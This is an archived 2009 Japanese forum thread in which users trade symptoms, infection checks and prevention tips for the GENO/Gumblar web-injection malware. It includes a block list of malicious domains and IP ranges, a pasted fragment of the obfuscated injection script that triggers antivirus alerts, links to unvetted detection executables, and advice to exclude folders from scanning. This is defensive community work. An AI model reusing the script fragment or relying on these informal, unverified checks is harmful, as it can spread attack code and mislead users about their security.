2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

GENOウイルススレ 感染2台目

1 :192.168.0.774:2009/05/18(月) 16:09:23 ID:BZ5+cjSr0
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

前スレ
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/internet/1242450264/

2 :192.168.0.774:2009/05/18(月) 16:10:00 ID:BZ5+cjSr0
感染予防対策

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

1.Adobe Readerを起動し「編集」メニューの「環境設定」
  「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
  OKを押して設定確定後、Adobe Readerを終了。

2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
  設定は SpeedUp - Fast がおすすめ。
   注意すべきは
   Acroform(拡張子なし)
   Annotations(拡張子なし)
   これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
   そうしないと Adobe Reader が起動しなかったりする。

   このとき追加作業として
   EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
   より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。

3 :192.168.0.774:2009/05/18(月) 16:10:43 ID:BZ5+cjSr0
以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html

国内の正規サイト改ざん:攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884


★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】


4 :192.168.0.774:2009/05/18(月) 16:11:11 ID:BZ5+cjSr0
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 ※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/



5 :192.168.0.774:2009/05/18(月) 16:11:47 ID:ua7Ctj4Z0
>>1
テンプレの症状にある「再起動時にBSOD」は、起動時にLANケーブルが抜かれていたり、IPブロックされていると
攻撃者のIPに繋がらないため、クラッシュさせる挙動だそうです。


6 :192.168.0.774:2009/05/18(月) 16:11:50 ID:BZ5+cjSr0
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認


7 :192.168.0.774:2009/05/18(月) 16:12:22 ID:wsKEiiw60
【感染の確認方法】■ Windows XP(5月18日現在)
 1 C:\WINDOWS\system32\sqlsodbc.chmを開いて壊れていたら感染濃厚 
 2 ↑のファイルサイズを確認する
  正常値  日本語版ヘルプ  50,727 bytes
        英語版ヘルプ    46133
        ドイツ語ヘルプ 48401
        フランス語ヘルプ 49345
        スペイン語ヘルプ 48475

 改竄されたsqlsodbc.chmの一例
  サイズが1.29 KB (1,323 バイト)
 更新日は2009年3月21日


 :
  

8 :192.168.0.774:2009/05/18(月) 16:14:07 ID:IfMEin9r0
Aviraたん何か更新きた

Virus definition file 7.01.03.218 2009/05/18

9 :192.168.0.774:2009/05/18(月) 16:15:58 ID:BZ5+cjSr0
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。

初心者や質問がある方は
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
上記のスレに行くと優しく教えてくれるかもです

Adobe Flash Player バージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

改竄されたsqlsodbc.chmは
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
正常な場合50,727バイト(日本語)です。

10 :192.168.0.774:2009/05/18(月) 16:16:46 ID:EMdE+yZc0
仕事行って来たんだけど、昨日の夜から何か出来事あった?

11 :192.168.0.774:2009/05/18(月) 16:17:04 ID:k2CI1leb0
>>1
スレ立て乙。
ちとしばらく潜るわ。
動作が不安定になる種も探したいし。

12 :192.168.0.774:2009/05/18(月) 16:17:32 ID:BZ5+cjSr0
>>7
VistaUltimateでは多言語での利用が可能ですが、複数sqlsodbc.chmが存在する場合はインストール済みの言語分存在する・・・かもしれません。

13 :192.168.0.774:2009/05/18(月) 16:23:05 ID:HT0KAN7x0
>>1
同人板は既に8スレ目であり、現状スレタイで質問禁止になっている

14 :192.168.0.774:2009/05/18(月) 16:23:43 ID:wU1qChfhP
>>1

情報多すぎて混乱してる人は、とにもかくにもAdobe製ツールを最新に
ブラウザ毎に最新にするんだぞ


15 :7:2009/05/18(月) 16:23:55 ID:wsKEiiw60
>>12
とりあえずXPだけまとめてみた
cmdもregeditも無問題でスキャンもすり抜けらしいので

vistaの改変例てどこかありましたか?
あと2kの判定方法も


16 :192.168.0.774:2009/05/18(月) 16:25:04 ID:ZMLDN5880
>>13
何故かスレタイは無視して良いってことになってる。

17 :192.168.0.774:2009/05/18(月) 16:26:57 ID:JmCcr4Q60
>>15
sqlsodbc.chmだがテンプレだと2kには無いってあるが家の2kSP4の奴には>7の英字版ヘルプと同サイズのが入ってた
だからこれも環境依存、かねぇ?

18 :192.168.0.774:2009/05/18(月) 16:28:56 ID:+m52NSIq0
乙なんじゃないのかな

19 :192.168.0.774:2009/05/18(月) 16:29:01 ID:duGXzOvm0
>>17
感染すると2kにもsqlsodbc.chmが出来るって聞きましたが

20 :192.168.0.774:2009/05/18(月) 16:29:13 ID:eM8L/6820
>>1 乙です
間違って zlkonウイルス擦れ 行ってたw


21 :192.168.0.774:2009/05/18(月) 16:30:26 ID:2R5fa0YFP
火狐の先読みって切らなくても大丈夫なん?

22 :192.168.0.774:2009/05/18(月) 16:30:30 ID:eOHkXG3n0
>>5
起動時にLANケーブルがついていたり
IPブロックされていなければ、
攻撃者のIPにつながるから、クラッシュさせる挙動をとらない
ということになるの?

23 :192.168.0.774:2009/05/18(月) 16:33:41 ID:JmCcr4Q60
>>19
あぁ、普段ネットワークに繋いでない非常時起動用の奴(ウィンアプデとかの時だけ繋ぐ)なんで
感染して作られたっつー可能性は低い、と思う(ヘルプとして開くしね)

24 :192.168.0.774:2009/05/18(月) 16:35:50 ID:8wGPADB70
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

これって上が正しいの?
もうまとめすら見るのが怖いんだが

25 :192.168.0.774:2009/05/18(月) 16:38:13 ID:k2CI1leb0
>>17
Windows 2000には標準では存在しない。
標準ではsqlsodbc.hlpしかない。
Visual StudioやMSDE、MSSQLをインストールすると入ると思う。
あるいはMDAC(Microsoft Data Access Components)をインストールしても
入る。


動作が不安定になる種が落ちてこないなぁ。

26 :192.168.0.774:2009/05/18(月) 16:38:28 ID:8UXA7HKu0
2kだけど
C:\WINDOWS
これがまずないんだがフォルダごと作られるってこと?
C:\WINNT\system32になら
sqlsodbc.hlpとsqlsodbc.GIDてのあったからかわりにここに作られる?

27 :192.168.0.774:2009/05/18(月) 16:39:22 ID:eM8L/6820
>>24
どちらも安全

28 :192.168.0.774:2009/05/18(月) 16:40:36 ID:+m52NSIq0
>>21
切っておこうぜ

29 :192.168.0.774:2009/05/18(月) 16:41:44 ID:+m52NSIq0
>>26
おっしゃるとおり、2kの場合はC:\WINDOWSを
C:\WINNTとして置き換えないといけない

30 :192.168.0.774:2009/05/18(月) 16:42:08 ID:8wGPADB70
>>27
ありがと
早くノートン対応してほしい・・・おちおちネットもしてられないなんて

31 :192.168.0.774:2009/05/18(月) 16:42:25 ID:k2CI1leb0
>>26
作られるとしたら、%Windir%のC:\WinNT以下のフォルダのはず。

32 :192.168.0.774:2009/05/18(月) 16:42:47 ID:JmCcr4Q60
>>25
あぁ仕事用としても使えるように当初作ったからその辺入ってるな。安心した

>>26
win2kの場合WINNTがデフォルト(NTの名残)XPになってWINDOWSがデフォルトに(Win95系終焉して統合したから)
なのでXPで\WINDOWS〜って時は2kだと\WINNT〜と読み替えるのが基本

33 :192.168.0.774:2009/05/18(月) 16:47:11 ID:8UXA7HKu0
>>29,31,32
なるほど
ありがとうございます

34 :192.168.0.774:2009/05/18(月) 16:47:20 ID:k2CI1leb0
>>32
ちなみにMDAC 2.8日本語版のsqlsodbc.chmのサイズは50,727 バイト(2003/06/27 17:06:44)
だった。

35 :192.168.0.774:2009/05/18(月) 16:55:40 ID:8GKrEP5/O
手書きブログ感染って本当?
ウイルスチェッカーでは調べることが出来ないんでわかる人居たら教えて

36 :192.168.0.774:2009/05/18(月) 16:56:46 ID:k2CI1leb0
>>5
これ試してみたけど、今飼ってるおとなしい奴はネットワークアダプタ
殺したり、ケーブル抜いたりしても普通に立ち上がるな。

37 :192.168.0.774:2009/05/18(月) 16:56:53 ID:rNK1DQEo0
>>35
チェッカーにかけなくてもソース見ればいいと思うよ

38 :192.168.0.774:2009/05/18(月) 16:59:00 ID:trRzScO50
FirefoxでAdblockPlus使ってるんだけど、気休めにフィルタ追加してみた
これで利くのかな?

*/94.229.[64-79].[0-255]/*
*/94.247.[2-3].[0-255]/*
*/95.129.[144-145].[0-255]/*
gumblar.cn
zlkon.lv
martuz.cn
bigtopsuper.cn
findyourbigwhy.cn

39 :192.168.0.774:2009/05/18(月) 16:59:28 ID:+lw3mpsu0
>>36
怖すぎるだろそれ…

まだ絶対クラッシュしてくれる方がありがたい。
自分が感染しているかどうか確証が持てない方が怖すぎる。

40 :192.168.0.774:2009/05/18(月) 17:00:56 ID:k2CI1leb0
>>35
google-analyticsの呼び出しでunescape使ってるから誤検知したんじゃないかな?

41 :192.168.0.774:2009/05/18(月) 17:00:59 ID:8GKrEP5/O
>>37
ざっとソースみても疑わしいものはなかったよ
それに手書きブログ踏んでみたけどavastたん反応しなかったし


詳しい人まじ詳細おね

42 :192.168.0.774:2009/05/18(月) 17:01:50 ID:s8PVU+vD0
>>1に書いてある症状でこのスレで追試できたのをまとめて欲しいな。

43 :192.168.0.774:2009/05/18(月) 17:02:40 ID:3Wf1BgQ0O
>>35
リンク集の方にURL載ってるが詳しくはわからん
報告ありしか書いてないからガセの可能性高い

44 :192.168.0.774:2009/05/18(月) 17:04:18 ID:7k/9HGtp0
>>37
前使ったことあって気になったから調べてみたけどchromeもavastも怒らない
jsファイル含め怪しい箇所もない
やっぱりgoogleのタグ誤検知かと

45 :192.168.0.774:2009/05/18(月) 17:05:23 ID:rNK1DQEo0
>>41
出たのがVIPで誰も相手にしてない感じだしガセなんじゃない?
手ブロのスレッドでも誰も何も言ってないし

46 :192.168.0.774:2009/05/18(月) 17:05:25 ID:7k/9HGtp0
安価ミス
>>44>>37じゃなくて>>41

47 :192.168.0.774:2009/05/18(月) 17:06:07 ID:8GKrEP5/O
>>40
誤検知かな・・・誤検知だったらいいんだが


>>43
本当にガセなのかわかればいいんだがあいにく私は調べ方わからんからなあ・・


>>44
やっぱりそうなのかな
とりあえず様子見てみることにするよ



48 :192.168.0.774:2009/05/18(月) 17:08:45 ID:F+zztV0c0
手ブロ見に行ってみたけどavastは暴走しなかったな
普通に見れるしソースもそんなおかしいのないしガセっぽいね

49 :192.168.0.774:2009/05/18(月) 17:09:22 ID:wU1qChfhP
>>35
ぱっと見では大丈夫そう
どうでもいいけど、そこソースが割と綺麗だな
ある程度手打ちで書いたのか

50 :192.168.0.774:2009/05/18(月) 17:12:35 ID:eM8L/6820
ttp://pipa.jp/tegaki 怪しいスクリプト入っていません

ガセですね 

51 :192.168.0.774:2009/05/18(月) 17:16:26 ID:hMt5GVQZ0
ネットカフェのPCって再起動したら設定とかもとに戻るんだっけ?
自PCでどこが安全か調べるのが怖いから
ネカフェ行ったほうがいいんだろうか。

52 :192.168.0.774:2009/05/18(月) 17:16:42 ID:7k/9HGtp0
http://geno.2ch.tc/index.php?url=http://pipa.jp/tegaki/

>URLでないと判断されました。
>評価ミス報告

そもそもこのチェッカーがおかしいと思うんだ
どういう風に組んだらこういう結果が出るんだよ

53 :35:2009/05/18(月) 17:19:15 ID:8GKrEP5/O
みなさん本当にありがとうございます
一応誤検知だということでいいですかね?
因みに>>47は私ですすいません


パソコンからじゃ書き込めないんで携帯から失礼しました



54 :192.168.0.774:2009/05/18(月) 17:19:38 ID:PGXf1oVHO
>>51
感染したらどうするつもり?

55 :192.168.0.774:2009/05/18(月) 17:19:40 ID:Anj4hR3G0
>>52
それを組んだのはセキュ板の方?

56 :192.168.0.774:2009/05/18(月) 17:23:05 ID:kh9I2kSv0
>>52
やってみたけど
診断できるぞ?

>危険度0%
>安全なURLです。踏んでも大丈夫でしょう。

誰か評価ミス送ったのかな?

57 :192.168.0.774:2009/05/18(月) 17:25:00 ID:eM8L/6820
【鑑定目的禁止】検出可否報告スレ10 より転載

gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。

sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。

このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。


58 :192.168.0.774:2009/05/18(月) 17:30:38 ID:R2ICsyNGO
感染してるサイトをこのチェッカーで調べても
なんも出てこないの俺だけ?

59 :192.168.0.774:2009/05/18(月) 17:34:30 ID:wU1qChfhP
使ってないから知らんけど、チェックしてるページが違うとか

60 :192.168.0.774:2009/05/18(月) 17:37:01 ID:DC1VgNqQ0
俺もやってみたけど0%だった
昨日の成美堂はちゃんとなったんだけどな


61 :192.168.0.774:2009/05/18(月) 17:38:55 ID:k2CI1leb0
>>5
別の種で試してみたら、再現した。
前の種で再現しなかったのは、いったんmartuz.cnに接続して
アクティブになったら発動しないってことなのかも??

62 :192.168.0.774:2009/05/18(月) 17:40:44 ID:R2ICsyNGO
鳥骨鶏とかリボンマジックが0になる

63 :60:2009/05/18(月) 17:40:56 ID:DC1VgNqQ0
あ、ごめんちゃんとなった


64 :192.168.0.774:2009/05/18(月) 17:41:26 ID:eM8L/6820
烏骨鶏やっとサイト閉じたな

65 :192.168.0.774:2009/05/18(月) 17:45:06 ID:lbjdJxFz0
確認する際は、キャッシュをしっかり削除してから。

とりあえず、ここまでF-Secure SASからの回答なし。
今夜くらいから動いてくれるのかね…今10時くらいだと思うし。

66 :192.168.0.774:2009/05/18(月) 17:47:13 ID:j9Y4xggD0
>980 192.168.0.774 sage 2009/05/18(月) 15:27:48 ID:gw0F+TVl0
>通称「GENOウイルス」・同人サイト向け対策まとめ
>ttp://www31.atwiki.jp/doujin_vinfo/pages/24.html
>にある
>ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定
>ですが
>ttp://esupport.trendmicro.co.jp/Pages/JP-2063926.aspx
>の注意書きにある ・・・

もう一度読み直してみるとGENOウイルスの動作では
同人サイトのファイアウォールの設定は危険ではないか

その設定をよく見ると、
例外ルール(プロトコル)のみの設定しかなく
例外ルール(プログラム)側のInternet Explorerのデフォルトが全て許可なので
実際に試したわけでないが、そこから抜けると思われ

67 :192.168.0.774:2009/05/18(月) 17:50:55 ID:lbjdJxFz0
>>48
おそらく unescapeの文字を見かけて危険と判断したと思われ。
…といっても、google-analytics.com のアクセス解析のみで、問題となるコードが無いか目視で確認しましたが、特に見当たりません。

68 :192.168.0.774:2009/05/18(月) 17:52:30 ID:ua7Ctj4Z0
>>6
>Bavast!(無料のアンチウイルスソフト)で確認

だから、そこ消して!!

Avastは、スクリプトが仕込まれたページの大半(反応しないものも確認されています)で反応しますが
落ちてきた本体に感染しているかどうかのチェックには使えません。


69 :192.168.0.774:2009/05/18(月) 17:57:46 ID:mHe74bNo0
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
ここのニュースを読むと犯人は中国のドメイン名だが、
サイトはロシアでホストに移動して活動しているとあるけど

この大元から犯人が捕まる可能性ってどのぐらいなんだ?
ウイルス作って逮捕されたやつ沢山いるが日本県警じゃムリだろうか

70 :192.168.0.774:2009/05/18(月) 17:58:16 ID:5fyyAw/a0
GenoVirus感染サイトリストで、感染の疑いがあるサイトのalfa-radio●comは、
ソース見る限り感染してるように見えないんだがどうだろう?

71 :192.168.0.774:2009/05/18(月) 18:00:00 ID:dFHP9qyG0
>>69
海外でも感染広がってるらしいから日本県警より海外の警察に任せたほうがよさそうだな

72 :192.168.0.774:2009/05/18(月) 18:00:11 ID:eOHkXG3n0
>>59
チェッカーは精度に問題あるから。

73 :192.168.0.774:2009/05/18(月) 18:01:43 ID:ua7Ctj4Z0
>>70
現時点では感染してる様子はありませんね。ソース見たけど入ってない。

74 :192.168.0.774:2009/05/18(月) 18:01:47 ID:wEi5/cqd0
なんかテンプレが古いな
gumblar.cnとかavastとかNoScriptとか

新種はmartuz.cn
avastは>>68
Fxを使用していてもNoScriptを使用する必要はないし
ブラウザもFxである必要はない
というかブラウザ依存のウイルスではないので
ブラウザを指定する必要はない。
ちょろめだけJSをオフれないということなのでそこだけ注意すればいいかと

75 :192.168.0.774:2009/05/18(月) 18:01:55 ID:JmCcr4Q60
>>69
中国、ロシア辺りだとおそらく無理だろなぁ…
ネトゲの垢ハックとかで被害届出してゲーム運営がログ提供しても最終的に中国とかロシアとかその手の方面で
追跡不能〜ってなるのがほとんどだそうだ。

76 :192.168.0.774:2009/05/18(月) 18:02:31 ID:j9Y4xggD0
ノートンのファイアウォールもウイルスバスターより癖が強いから
設定の甘さでファイアウォールをしていてもなんの意味を持たないことにもなる
もう一度下記サイトの各種設定を見直す必要があると思われ
http://www31.atwiki.jp/doujin_vinfo/pages/24.html

77 :192.168.0.774:2009/05/18(月) 18:05:50 ID:v6qQswXM0
http://genolists.alink.uic.to/
ここの管理人の人まだ見てるかな?
リストが増えてきたんで、重複とか、タレコミを受けて閉鎖対処したサイトとか、
あとろくに自力で調べもしない人が噂だけ鵜呑みにして「確定サイト」扱いで登録した白サイトとかあるから
できれば管理人権限で整理してくれると助かります

っていうかちゃんと役に立ってるのかな?このリスト

78 :192.168.0.774:2009/05/18(月) 18:06:50 ID:FI6RkFNE0
【議論OK】GENOウイルス晒しスレ
http://changi.2ch.net/test/read.cgi/doujin/1242615305/

79 :192.168.0.774:2009/05/18(月) 18:07:29 ID:mHe74bNo0
>>71
海外の警察のほうが頼りになるか
そうだな

80 :192.168.0.774:2009/05/18(月) 18:08:18 ID:eM8L/6820
>>70
私も見ましたけど怪しいスクリプトは無いですね

81 :192.168.0.774:2009/05/18(月) 18:08:31 ID:EgqX730p0
いっそロシアンマフィアのPCクラッシュさせて消されればいい

82 :192.168.0.774:2009/05/18(月) 18:10:31 ID:mHe74bNo0
>>75
イギリスに移動したとあるからその辺に期待
アメリカにいかないのは危険だと思っているのだろうかやはり

83 :192.168.0.774:2009/05/18(月) 18:11:58 ID:wU1qChfhP
>>70
俺も大丈夫だと思うけど、どうだろうな
>>40辺りの理由かも

84 :192.168.0.774:2009/05/18(月) 18:12:50 ID:eM8L/6820
今回のウイルスは巨大botnetを作るのが目的だとか?
どこかのサイトで見ました。犯罪者集団ですね

85 :192.168.0.774:2009/05/18(月) 18:14:41 ID:3Wf1BgQ0O
>>77
微妙な所だね
自分でも感染サイト探してるけどなかなか難しい

86 :192.168.0.774:2009/05/18(月) 18:14:43 ID:KeDzETgR0
>>8
週末に騒ぎが始まってから
ずっと1時間おきくらいにうpだて手動チェックしてるが
ログ見返したら25回くらい更新があった
日本語じゃないせいか全然話題に上らないが
これはちゃんと仕事してくれてると思っていいんだよな?

87 :192.168.0.774:2009/05/18(月) 18:18:44 ID:yY1zypbb0
>>84
so-net セキュリティ通信
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1890

これだね

88 :192.168.0.774:2009/05/18(月) 18:22:50 ID:8GKrEP5/O
>>78
avastたん反応したんだが
なにこれ

89 :192.168.0.774:2009/05/18(月) 18:24:43 ID:lbjdJxFz0
>>88
avastが反応するようなコードが名前欄に貼ってあるから

90 :192.168.0.774:2009/05/18(月) 18:26:38 ID:gM07vQcn0
>>88
Avastが今回の騒ぎに使われてるJavascriptの一部分をシグニチャとして持ってて、
その文字列を含んでるので反応する。
一時期流行ったLoveLetterの一部貼ってノートン反応するのと一緒。

91 :88:2009/05/18(月) 18:28:03 ID:8GKrEP5/O
>>89
なんだ・・
URLのよく出来た釣りに引っ掛かったのかと思った

92 :192.168.0.774:2009/05/18(月) 18:28:07 ID:ivBmAr0O0
>>77
それ編集とか削除するためには登録者のパスワードが必要だよね。
有志が編集できるように共通のパス決めといた方がいいと思うんだが。「geno」とか。

93 :192.168.0.774:2009/05/18(月) 18:28:43 ID:EMdE+yZc0
>>78
おい専ブラなのにavast怒ったぞ。
スレ一覧全部飛んだじゃねーか死ね

94 :192.168.0.774:2009/05/18(月) 18:29:17 ID:jHA8BSMo0
なんでこんな深刻な被害ありそうなのに
2chの一部でしか警戒されてないんだ?
今までのウイルスも最初はこんな感じなのかな?


95 :192.168.0.774:2009/05/18(月) 18:29:51 ID:9chuMM1o0
>>91
専ブラで2ch見てるなら、専ブラのフォルダを除外指定すれば
その手のテキストで書かれただけのソースコードは引っ掛からなくなるよ

96 :192.168.0.774:2009/05/18(月) 18:30:18 ID:ua7Ctj4Z0
>>84,>>87
こっちのほうがハッキリ書いてある。

http://www.aladdin.co.jp/esafe/virus/v_all/AircBlog_post_2009_05_How-a-popular-nightlife-website-ruined-its-visitor's-weekend.html

97 :192.168.0.774:2009/05/18(月) 18:30:36 ID:yY1zypbb0
>>94
見た目が派手じゃないから

98 :192.168.0.774:2009/05/18(月) 18:32:20 ID:TM5Ovwjd0
幼女ウィルスみたいに具体的に何されてるか分からないからなぁ

99 :192.168.0.774:2009/05/18(月) 18:33:09 ID:v6qQswXM0
>>92
そうなんだよね、登録者or管理者でないと編集・削除が出来ないから
重複や誤報のURLの削除を迅速にするには、それが一番いい
次回からgenoで統一してもらうようにする?

100 : ◆f/iQdjPxCM :2009/05/18(月) 18:33:35 ID:76hdi/6T0
前スレに引き続き。
もはや当てにはなるまい cmd.exe や regedt32.exe/regedit.exe の起動や、
環境条件依存性の強い sqlsodbc.chm ではなく、
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\
の方から調べてみるアプローチの模索。
まだ試作段階で結果は信用できる段階にありません。
一般的見地からはこれ自体が「不審なEXEファイル」なので、
俺が言うのもなんだけど、一般の人は少なくとも、
玄人が仮想環境等を使って害が無さそうなことを確認してくれるまでは、
手を出さないこと推奨、かね。
想定ターゲットは win2k/xp(32bit).

仮想環境でブツを飼ってる玄人で暇な人はテストにお付き合い頂ければ幸いです。


GENOdetect_v003.LZH
ttp://www1.axfc.net/uploader/Sc/so/2405
DLkey: testGENOdetect

GENOenvinfo_v003.LZH
ttp://www1.axfc.net/uploader/Sc/so/2404
DLkey: testGENOdetect

SIZE (GENOdetect.exe) = 8192
MD5 (GENOdetect.exe) = f228b8db63dba8175ec6579f8a87c6d7
SHA1 (GENOdetect.exe) = b263461103e693d4ce2be15757ded9ec544821d5
SHA256 (GENOdetect.exe) = 67e3465d9dd8eac015853103d2ec16f58ac78ec3b9cc706476f5dc53b1f49cb3
SHA512 (GENOdetect.exe) = 1ec0ab0588484c4622e37c968619a142c7ff92ce39ed6045dfda7d8294d28eb7443d02e1725793b2ff088e25a2602fc14a072e30d456534dedc271d55047c74e

SIZE (GENOenvinfo.exe) = 9216
MD5 (GENOenvinfo.exe) = cbf1b467b0082b665c95c55f4e090cf8
SHA1 (GENOenvinfo.exe) = 7bf9cba9e1aa4c47e3c035e4077308cb29fd073b
SHA256 (GENOenvinfo.exe) = 3f375b58e6e38ac95c187e9bc9b0cd997d8373be5f5d61913f520c4cf71caa29
SHA512 (GENOenvinfo.exe) = 0171c6a410d10ecc6a1b6c1793f19a9d4f7fd68aac8a1b430da7c6f08e41a7c6a56496d100be50290c75ee95b1edeacb08cb71df0f7f7d6c7da11632f2036d09


detect の方が最終的に一般向けになれれば版、
envinfo の方がdebug目的で GENOenvinfo_log.txt を生成する版。
GENOenvinfo_log.txt はユーザ名(ログオン名)が含まれる場合がありますので、
テストに協力して頂ける等で公開する際にはご注意下さい。


101 :192.168.0.774:2009/05/18(月) 18:33:59 ID:3VJel2as0
(){eval(unescape(('Script(t,'%')))})(/./g);
この文字列をNGワードにすれば良いのでは?
これはウイルスではありませんので安心してください。

102 :192.168.0.774:2009/05/18(月) 18:36:05 ID:4ySopLDi0
おい更新したらavastが反応したぞコラ

103 :192.168.0.774:2009/05/18(月) 18:36:51 ID:ivBmAr0O0
>>99
とりあえず俺が登録するときはパスは「geno」にしときますわ

104 :192.168.0.774:2009/05/18(月) 18:36:56 ID:8GKrEP5/O
>>99
パスワードを知った愉快犯が変にいじくってしまったらどうする?


105 :192.168.0.774:2009/05/18(月) 18:37:02 ID:r2xJxp6a0
更新したら心臓止まりそうになったわ

106 :192.168.0.774:2009/05/18(月) 18:39:48 ID:duvNIOfD0
GENO URLチェッカーは、まだ未完成と・・・・
GENOウィルスツールの検出精度ってどうなんだろ?

107 :192.168.0.774:2009/05/18(月) 18:40:21 ID:QTaoO352O
スレ更新したら反応したんだけど・・・
マジでやめてくれよ

108 :192.168.0.774:2009/05/18(月) 18:40:33 ID:enUpbFMt0
統計的に有意性を取ってみたいが検証する暇がない

109 :192.168.0.774:2009/05/18(月) 18:40:36 ID:bV3w8TeO0
セキュ板の本スレ何なんだ、いつの間にか二桁いってるし
GENO感染時にいたみんなはここに避難したかんじかな?

>>78 のスレ、avastが反応するな

110 :192.168.0.774:2009/05/18(月) 18:41:40 ID:WUiMUIup0
ここもavast反応するんだが…

111 :192.168.0.774:2009/05/18(月) 18:42:37 ID:IfMEin9r0
Virus definition file 7.01.03.218 2009/05/18
Virus definition file 7.01.03.219 2009/05/18
Virus definition file 7.01.03.220 2009/05/18

Avira今日だけで3回更新w

112 :192.168.0.774:2009/05/18(月) 18:42:50 ID:cNzce2cIP
どこのバカだウイルスのコード貼ったの
avastさん激怒でアクセスできなくなったじゃねーか!

113 :192.168.0.774:2009/05/18(月) 18:43:33 ID:eM8L/6820
>>109
ここに引っ越してますよ^^

114 :192.168.0.774:2009/05/18(月) 18:43:33 ID:8GKrEP5/O
avastたんかわいいよavastたん

115 :192.168.0.774:2009/05/18(月) 18:43:48 ID:nYc6GBj10
この程度で騒ぐな情弱ども

116 :192.168.0.774:2009/05/18(月) 18:44:42 ID:9chuMM1o0
このスレでavastが反応する人は
タスクのavastアイコンクリックして標準シールド→詳細な設定→追加設定タブで
下のところにある除外設定で専ブラのフォルダ指定すれ

117 :192.168.0.774:2009/05/18(月) 18:44:54 ID:UYH62RHM0
>>101
ウィルスコードだな
このスレまで反応したぞw
